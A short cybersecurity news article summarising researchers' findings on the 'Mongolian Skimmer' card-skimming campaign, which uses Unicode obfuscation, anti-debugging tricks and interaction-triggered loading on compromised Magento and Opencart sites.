Mongolian Skimmer: A New Digital Skimmer Campaign
Cybersecurity researchers have uncovered a sophisticated digital skimmer campaign known as Mongolian Skimmer, which employs Unicode obfuscation techniques to conceal malicious code.
In an analysis by Jscrambler researchers, they highlighted the unusual use of Unicode characters in the skimmer script, making it hard to decipher for humans. This technique effectively conceals the skimmer’s malicious functionality, allowing it to evade detection.
The skimmer leverages JavaScript’s capability to use Unicode characters in identifiers, enabling it to steal sensitive data from e-commerce checkout or admin pages. This data, including financial information, is then sent to an attacker-controlled server.
The skimmer script, typically inserted as an inline script on compromised websites, fetches the actual payload from an external server to avoid detection. It also employs techniques to disable certain functions when a user attempts to debug the script using browser developer tools.
Jscrambler’s Pedro Fortuna highlighted that the skimmer uses a variety of event-handling techniques to ensure compatibility across different browsers, making it a potent threat to a wide range of users.
The researchers also identified a unique loader variant that loads the skimmer script only during user interaction events such as scrolling or mouse movements. This technique serves as an anti-bot measure and ensures optimal performance.
It was discovered that the compromised Magento sites delivering the skimmer were also targeted by another skimmer actor, indicating collaboration between threat groups to maximize profits.
Interaction between the threat actors was observed through source code comments, indicating a profit-sharing agreement. The collaboration underscores the sophistication and coordination among cybercriminals.
The methods used to deliver the skimmer malware remain unclear, but researchers suspect that misconfigured or vulnerable Magento and Opencart instances are being targeted. Awareness and vigilance are crucial to combat such evolving threats.
If you found this article intriguing, make sure to follow us on Twitter and LinkedIn for more exclusive content.